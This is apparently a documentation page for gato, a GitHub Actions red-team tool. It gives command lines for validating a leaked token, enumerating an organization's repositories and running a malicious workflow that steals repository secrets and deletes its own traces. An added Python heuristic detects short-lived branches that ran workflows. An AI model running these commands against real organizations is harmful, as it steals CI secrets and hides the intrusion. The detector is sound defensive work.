Scenarios
This page is a living document of real-world examples where gato is useful. At a high level: I have X, how can I do Y?
This is where gato is most useful as a tool. Suppose you are conducting a penetration test or red team and identify a personal access token hard-coded in a script.
The first step is to validate the token:
gato e -v
Suppose your target is EvilCorp, and you find that the user is a member of EvilCorp:
gato -s e -t evilcorp -oJ evilcorp_gato.json
The above command will list and enumerate all repositories within the evilcorp GitHub organization. It will determine the user's permissions to each repository and provide you with everything that user can access and how to take advantage of it.
Suppose gato finds that the user can access secrets from EvilRepository, and because the token has the workflow scope, the user can steal them with a malicious workflow.
gato -s attack -t evilcorp/evilrepository --secrets --delete-action
Gato will create a new branch, push a workflow to it, wait for the workflow to execute, and then download the run log, which contains the secrets asymmetrically encrypted with a just-in-time public key. This prevents broader compromise if someone else later reads the run log.
Gato will then decrypt the secrets and print them. Gato only supports exfiltrating secrets from one repository at a time. Nothing stops you from writing a wrapper script to exfiltrate secrets from an entire organization if you so choose.
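From the defending side, the sequence just described (a branch appears, a workflow runs on it, and the branch is removed shortly afterwards by the same actor) is the footprint to look for. The following is an added example, not part of the gato project or this wiki: a small heuristic detector over a constructed event list. The event format and the action names (branch.create, workflow.run, branch.delete) are assumptions made for this example and are not GitHub's audit-log schema; map them to whatever your own log source emits.

```python
"""Heuristic detector for short-lived branches that ran a workflow.

Added example, not gato's own code. The input is a constructed list of
event dicts with keys ts (epoch seconds), action, actor, repo, branch.
The action names are hypothetical and NOT GitHub's audit-log schema.
"""
from collections import defaultdict

# Assumption: a branch that lives less than this long and still managed
# to run a workflow is suspicious enough to surface for review.
WINDOW_SECONDS = 30 * 60

# Constructed sample events (hypothetical format), oldest first.
SAMPLE_EVENTS = [
    {"ts": 1000, "action": "branch.create", "actor": "svc-deploy",
     "repo": "evilcorp/evilrepository", "branch": "feature-x"},
    {"ts": 1060, "action": "workflow.run", "actor": "svc-deploy",
     "repo": "evilcorp/evilrepository", "branch": "feature-x"},
    {"ts": 1200, "action": "branch.delete", "actor": "svc-deploy",
     "repo": "evilcorp/evilrepository", "branch": "feature-x"},
    # Benign: a normal feature branch that lived for a day before cleanup.
    {"ts": 2000, "action": "branch.create", "actor": "alice",
     "repo": "evilcorp/webapp", "branch": "fix-typo"},
    {"ts": 2100, "action": "workflow.run", "actor": "alice",
     "repo": "evilcorp/webapp", "branch": "fix-typo"},
    {"ts": 90000, "action": "branch.delete", "actor": "alice",
     "repo": "evilcorp/webapp", "branch": "fix-typo"},
]


def find_short_lived_workflow_branches(events, window=WINDOW_SECONDS):
    """Return one finding per (repo, branch) that was created, ran at least
    one workflow, and was deleted again within `window` seconds."""
    by_branch = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_branch[(ev["repo"], ev["branch"])].append(ev)

    findings = []
    for (repo, branch), evs in by_branch.items():
        created = next((e for e in evs if e["action"] == "branch.create"), None)
        deleted = next((e for e in evs if e["action"] == "branch.delete"), None)
        if created is None or deleted is None or deleted["ts"] < created["ts"]:
            continue
        runs = [e for e in evs
                if e["action"] == "workflow.run"
                and created["ts"] <= e["ts"] <= deleted["ts"]]
        lifetime = deleted["ts"] - created["ts"]
        if runs and lifetime <= window:
            findings.append({
                "repo": repo,
                "branch": branch,
                "actor": created["actor"],
                "lifetime_seconds": lifetime,
                "workflow_runs": len(runs),
            })
    return findings


if __name__ == "__main__":
    for finding in find_short_lived_workflow_branches(SAMPLE_EVENTS):
        print(finding)
```

The window is deliberately generous; tune it against your own branch-lifetime baseline, and treat a hit as a triage lead (who created the branch, which secrets the workflow could reach) rather than a verdict.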
TODO
TODO
gato -s enumerate -t targetOrg -oJ target_org_gato.json